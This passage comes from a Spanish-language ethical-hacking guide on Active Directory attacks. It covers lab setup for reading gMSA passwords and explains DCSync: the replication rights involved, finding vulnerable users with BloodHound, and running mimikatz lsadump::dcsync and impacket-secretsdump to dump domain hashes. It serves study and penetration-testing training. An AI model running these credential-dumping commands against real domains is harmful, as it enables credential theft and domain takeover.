Administrator tiene permisos para leer el atributo msDS-ManagedPassword para luego extraer la contraseña. [](#preparacion-de-laboratorio) Preparación de Laboratorio --------------------------------------------------------------- 1. Creación de cuenta gMSA. Copy new-adserviceaccount -name test2 -dnshostname $env:computername -PrincipalsAllowedToRetrieveManagedPassword "GMSAGroup" -Enabled $true Get-ADServiceAccount -Identity 'test2' install-adserviceaccount -identity test2 Test-ADServiceAccount -Identity test2 1. Se le da permisos de lectura a la contraseña de la cuenta test2 creada. Le daremos acceso al usuario JROJAS. Copy Set-ADServiceAccount -Identity "test2" -PrincipalsAllowedToRetrieveManagedPassword "jrojas" [PreviousCracking Online](/ethical-infraestructura/cracking-online) [NextAS REP-ROASTING](/ethical-infraestructura/as-rep-roasting) Last updated 6 months ago ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F5nYKzffjlPIh9BFy9krq%252Fimage.png%3Falt%3Dmedia%26token%3Dd5a611ce-c825-4732-8f8e-2e8b7b229733&width=768&dpr=4&quality=100&sign=a3f9c5df&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fwb1RJXXLWnqbPTeArvZ1%252Fimage.png%3Falt%3Dmedia%26token%3D5f986b2a-a4a0-4676-a213-e1f882c1c5a1&width=768&dpr=4&quality=100&sign=45c5d259&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252Fi4Nh6RFObz9lzchxx7uJ%252Fimage.png%3Falt%3Dmedia%26token%3D608315fd-4869-4876-bdcd-e440c449d33f&width=768&dpr=4&quality=100&sign=beaf1d82&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FBM5EXOGgn5dIjetlNzPR%252Fimage.png%3Falt%3Dmedia%26token%3Ddd90df92-42fe-4f49-8958-817fad54a9ec&width=768&dpr=4&quality=100&sign=ca5edc58&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FXFbx4EJbYmzxIi0jwMLM%252Fimage.png%3Falt%3Dmedia%26token%3D745de9be-60c6-460f-ab85-8cd9373c205a&width=768&dpr=4&quality=100&sign=6bd2fb9&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FTyZbFW1KGv5cpQ3kAj1D%252Fimage.png%3Falt%3Dmedia%26token%3De24401ce-6b6c-488a-8fc2-3fed3b31b421&width=768&dpr=4&quality=100&sign=130819ca&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FfjeYPyyjBu30CIx8ObeF%252Fimage.png%3Falt%3Dmedia%26token%3D7bc647d9-80c3-4348-8fab-a525d898a31f&width=768&dpr=4&quality=100&sign=6d3f88c4&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F9JCwFpw6lFvnygsCzsST%252Fimage.png%3Falt%3Dmedia%26token%3De3cabcbc-d4f6-48cc-95eb-13b234dda344&width=768&dpr=4&quality=100&sign=d9b542c7&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FN3bCQR3EzIn81V69nhSw%252Fimage.png%3Falt%3Dmedia%26token%3D12147ec7-25e9-422f-87c8-6e1a3b278998&width=768&dpr=4&quality=100&sign=e90d5a1f&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FJpDfCYNTVkWynj8n8YpU%252Fimage.png%3Falt%3Dmedia%26token%3D2f2c41b7-45c5-4eab-9518-8ea8185c259f&width=768&dpr=4&quality=100&sign=6cffc876&sv=2) [![Logo](https://github.com/fluidicon.png)GitHub - micahvandeusen/gMSADumper: Lists who can read any gMSA password blobs and parses them if the current user has access.GitHub](https://github.com/micahvandeusen/gMSADumper) --- # DCSync Attack | EH - Infraestructura [PreviousLateralización](/ethical-infraestructura/lateralizacion) [NextEnumeración en AD](/ethical-infraestructura/enumeracion-en-ad) Last updated 10 months ago [](#concepto) Concepto --------------------------- * Se busca identificar usuarios que cuenten con los siguientes privilegios: DS-Replication-Get-Changes-All y DS-Replication-Get-Changes (de forma predeterminada, los administradores de DC, los miembros de grupos con muchos privilegios, como los administradores de dominio o los administradores de empresa, tienen estos derechos ) , con los usuarios que tienen estos permisos es posible realizar el ataque DCSYNC. * A través de estos permisos un usuario puede tener altos privilegios en el dominio y ganar acceso. * Para que el usuario sea vulnerable debe configurarse lo siguiente en Active Directory: Los permisos que debe tener son: * Replicating Directory Changes * Replicating Directory Changes All * Replicating Directory Changes In Filtered Set [](#identificacion-de-vulnerabilidad) Identificación de Vulnerabilidad --------------------------------------------------------------------------- * El proceso de identificación principalmente es del tipo ensayo/error. Por ejemplo, con CRACKMAPEXEC no es posible identificar un comportamiento diferente. * Sin embargo, podemos utilizar BLOODHOUND para identificar los usuarios a través de los cuales podemos aprovechar la vulnerabilidad DCSYNC. **Importante:** * Revisar la opción "FIND PRINCIPALS WITH DCSYNC RIGHTS" * Por defecto los usuarios con altos privilegios (Domain Admins) tienen esos privilegios. * Se debe identificar el usuario que no se encuentra dentro de este grupo al cual se le haya brindado los privilegios para realizar el ataque. [](#mecanismo-de-explotacion) Mecanismo de Explotación ----------------------------------------------------------- Existen diferentes mecanismos de identificación de los usuarios con los privilegios necesarios para realizar el ataque. **Importante**: * Si no se tiene acceso al servidor (AD) las únicas maneras de identificar el usuario es del tipo ENSAYO/ERROR. ### [](#explotacion-local) Explotación Local Desde un computador del dominio donde este logueado el usuario vulnerable se debe ejecutar MIMIKATZ y por ejemplo obtener información sensible del usuario KRBTG. Copy C:\Windows\test>mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # lsadump::dcsync /domain:enterprise.com /user:krbtgt Explotación Remota Desde KALI Linux utilizamos SECRETDUMP con el usuario vulnerable para obtener los HASHES del sistema. Copy ┌──(root㉿kali)-[/home/kali/Downloads] └─# impacket-secretsdump -just-dc adminsystem:Password2@192.168.4.100 -outputfile dcsync_hashes -history -pwd-last-set Algunas opciones que se pueden utilizar: Copy [-just-dc-user ] #To get only of that user [-pwd-last-set] #To see when each account's password was last changed [-history] #To dump password history, may be helpful for offline password cracking ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252F3NMGmxJJfGJq5JrwYbjg%252Fimage.png%3Falt%3Dmedia%26token%3D6e98ddfa-9bc1-4176-8706-e20874e05da9&width=768&dpr=4&quality=100&sign=22edd3c2&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FfciPbQ8AwCNQbueRpEzr%252Fimage.png%3Falt%3Dmedia%26token%3D41333484-19a1-4c12-984a-9962abb21eca&width=768&dpr=4&quality=100&sign=e283d3ce&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FbNQZwgciIBH5HHnqNlM2%252Fimage.png%3Falt%3Dmedia%26token%3D59e377b2-9518-4229-9ef8-be65fc745743&width=768&dpr=4&quality=100&sign=299c853f&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FrHflrqYNWFLEWnRWtuAu%252Fimage.png%3Falt%3Dmedia%26token%3Dc5f0ef00-7702-4f4d-ade6-094bbed89d65&width=768&dpr=4&quality=100&sign=19041ef&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FW2EFBEoLHcgH0MXD1237%252Fimage.png%3Falt%3Dmedia%26token%3Dc7d51a07-b55d-43db-a2cf-67ec4064efc5&width=768&dpr=4&quality=100&sign=f2847c30&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FWjMd45BqSJ7lknc7TKzD%252Fimage.png%3Falt%3Dmedia%26token%3D2662d0f7-1017-4c6a-8d9a-d81cfac3c643&width=768&dpr=4&quality=100&sign=96713754&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FXFC5RvQIrLsTC1L6Njcb%252Fimage.png%3Falt%3Dmedia%26token%3Deefa18e2-eba2-4cd3-9897-751565ba6044&width=768&dpr=4&quality=100&sign=c6bfd15b&sv=2) ![](https://omarc320.gitbook.io/~gitbook/image?url=https%3A%2F%2F3741330946-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FKX3Vc1QrEuNFDUSnFFhR%252Fuploads%252FklRNUEafIkPfqWDoyxTX%252Fimage.png%3Falt%3Dmedia%26token%3D5b13b5df-a155-4f21-8f91-538b88387721&width=768&dpr=4&quality=100&sign=eb25cdb4&sv=2) [![Logo](https://www.kali.org/images/favicon.png)bloodhound | Kali Linux ToolsKali Linux](https://www.kali.org/tools/bloodhound/) ---